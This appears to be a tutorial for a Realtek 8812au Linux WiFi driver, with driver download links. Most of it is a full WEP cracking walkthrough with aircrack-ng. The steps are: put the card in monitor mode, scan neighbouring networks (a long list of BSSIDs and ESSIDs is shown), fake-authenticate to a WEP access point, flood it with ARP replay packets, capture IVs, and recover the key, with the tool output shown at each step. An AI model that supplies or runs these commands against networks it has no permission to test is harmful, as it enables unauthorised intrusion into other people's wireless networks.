Download the Linux WiFi driver.
https://mega.nz/#!f1FHnT5S!LuYHjVofjRl8TlE7T--anLkV-0zBwko2FFMMCypmlGcor
https://drive.google.com/file/d/0B5CVb15vbMjCeXJsNUFRUUJPZEE/view?usp=sharingdecompress the driver package,and make for compile it.
#insmod 8812au.ko
1. #ifconfig wlan0 up
Use follow cmd to replace the airmon-ng start wlan0
2. #iwconfig wlan0 mode monitor
3. #airodump-ng wlan0
or select a channel to site survey ,example: -c 1 is select channel 1.
#airodump-ng wlan0 -c 1
CH 1 ][ Elapsed: 4 s ][ 2015-09-01 12:21
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0B:6B:7F:52:56 -74 0 4 0 0 1 54e. WPA2 CCMP PSK 000_2G_test
24:DE:C6:50:C4:60 -80 0 0 5 1 1 -1 WPA
00:26:5A:FF:CB:AB -35 100 54 11 2 1 54e. WEP WEP dlink655
00:1D:73:B4:47:81 -40 0 24 0 0 2 54e. OPN KKKVAP
00:E0:B9:8C:29:42 -35 40 30 0 0 1 54e WEP WEP RTK 11n AP 2.4G
00:E0:4C:97:2B:A4 -54 49 33 18 0 1 54e OPN sd4_open
00:3A:9D:B8:F2:C0 -53 0 54 0 0 1 54e. WPA2 CCMP PSK WARPSTAR-EF574E-G
06:3A:9D:B8:F2:C0 -55 0 44 0 0 1 54e. WEP WEP WARPSTAR-EF574E-GW
10:0D:7F:87:C0:39 -49 67 52 53 0 1 54e OPN NETGEAR-R6300
20:AA:4B:E4:24:A8 -48 90 46 0 0 1 54e WPA2 CCMP PSK CC_854552_q1
00:18:E7:E1:FB:B6 -56 87 35 0 0 1 54e. WPA2 CCMP PSK Chromium
68:A3:C4:E4:4F:DE -53 50 32 0 0 1 54e WPA2 CCMP PSK SX8ex
00:22:6B:70:D0:5C -60 40 25 0 0 2 54e WPA2 CCMP PSK Arder_2G
00:88:66:55:AA:BB -57 43 33 0 0 1 54e OPN A_AP_24
84:1B:5E:45:02:E4 -56 100 50 1 0 1 54e OPN NETGEAR67
00:23:54:DB:31:B0 -58 67 36 0 0 1 54e. WPA TKIP PSK AAA_RT_N11
00:40:5A:AE:AB:C8 -61 38 27 0 0 3 54e. WPA TKIP PSK
98:FC:11:5A:0F:8E -55 52 30 6 0 3 54e WPA2 CCMP PSK SD4CiscoE1000
00:40:5A:AE:AB:C9 -60 55 32 0 0 3 54e. WPA2 TKIP PSK SD1_ADSL
48:EE:0C:2B:57:E4 -63 7 5 0 0 1 54e. WPA2 CCMP PSK
00:E0:4C:11:11:21 -65 35 30 0 0 1 54e. OPN NETGEAR57_RPT
10:BF:48:3D:FA:9B -58 26 16 0 0 1 54e WPA2 CCMP PSK SD1-ASUS
5C:63:BF:38:B0:D2 -66 48 31 0 0 1 54e. WPA2 CCMP PSK Atheros_JSW
E4:F4:C6:08:49:3D -65 44 25 0 0 1 54e OPN NETGEAR57
00:E4:10:81:96:D1 -65 38 27 0 0 1 54e OPN 92E 2.4G
D8:EB:97:2A:5C:6D -67 28 22 0 0 1 54e. WPA2 CCMP PSK KAVEN
00:E0:4C:97:2B:9A -66 11 8 0 0 1 54e WPA2 CCMP MGT pcache123
3C:1E:04:65:0C:13 -68 16 11 1 0 1 54e WPA2 CCMP PSK MY600M
00:A0:B0:D5:FD:98 -69 0 4 4 0 1 54e. WPA2 CCMP PSK 2222222222
AC:22:0B:31:B7:00 -68 39 17 0 0 1 54e WPA2 TKIP MGT WlanHCK-3167
00:99:11:22:66:78 -67 33 28 0 0 1 54e OPN Amped_TitanEX_2.4
10:66:82:1E:77:BE -68 23 18 2 0 1 54e WPA2 CCMP PSK aterm-19010c-g
8C:BE:BE:04:E7:FB -69 0 9 0 0 1 54e. WPA2 CCMP PSK Xiaomi_RTCN1
4. choice AP's ESSID and ENC is WEP
00:26:5A:FF:CB:AB -35 100 54 11 2 1 54e. WEP WEP dlink655
Connect to with AP , -a + ESSID, -h + your WLAN MAC address.
#aireplay-ng -1 0 -a 00:26:5A:FF:CB:AB -h 5C:F3:70:09:72:07 wlan0
10:25:59 Waiting for beacon frame (BSSID: 00:26:5A:FF:CB:AB) on channel 1
10:25:59 Sending Authentication Request (Open System) [ACK]
10:25:59 Authentication successful
10:25:59 Sending Association Request [ACK]
10:25:59 Association successful :-) (AID: 1)
5. Wait to receive a ARP Request,and transmit duplicate ARP attack Packets.
#aireplay-ng -3 -b 00:26:5A:FF:CB:AB -h 5C:F3:70:09:72:07 wlan0
10:26:03 Waiting for beacon frame (BSSID: 00:26:5A:FF:CB:AB) on channel 1
Saving ARP requests in replay_arp-0901-102603.cap
You should also start airodump-ng to capture replies.
58319 packets (got 14550 ARP requests and 23648 ACKs), sent 57675 packets...(499 pps)
6. Open an another window,execute CMD for Capture WEP IVs packet data.
#airodump-ng -c 1 --bssid 00:26:5A:FF:CB:AB -w wep wlan0
CH 1 ][ Elapsed: 1 min ][ 2015-09-01 10:28
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:26:5A:FF:CB:AB -32 6 675 12443 73 1 54e. WEP WEP dlink655
BSSID STATION PWR Rate Lost Frames Probe
00:26:5A:FF:CB:AB 5C:F3:70:09:72:07 0 12 - 1 0 48434
7. Wait for Capture #DATA number over the 10000,execute crack and find KEY.
#aircrack-ng -b 00:26:5A:FF:CB:AB wep-01.cap
Aircrack-ng 1.2 beta3
[00:00:04] Tested 59712 keys (got 10816 IVs)
KB depth byte(vote)
0 6/ 8 BD(14592) 12(14080) 38(14080) BB(14080) D0(14080) 6A(13824) C2(13824) 01(13568)
1 0/ 2 34(18176) 68(15872) D7(14848) E7(14592) 15(14336) EE(14336) F0(14336) 07(14080)
2 4/ 85 56(14336) 83(14336) BE(14080) C9(14080) 2C(13824) 18(13568) 3C(13568) 43(13568)
3 2/ 10 78(14848) F0(14848) 08(14848) 5E(14848) 83(14592) 52(14336) E5(14080) 68(14080)
4 0/ 5 90(17664) 85(15360) 07(14848) 67(14592) 12(14592) 82(14336) A0(14336) 0E(14080)
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%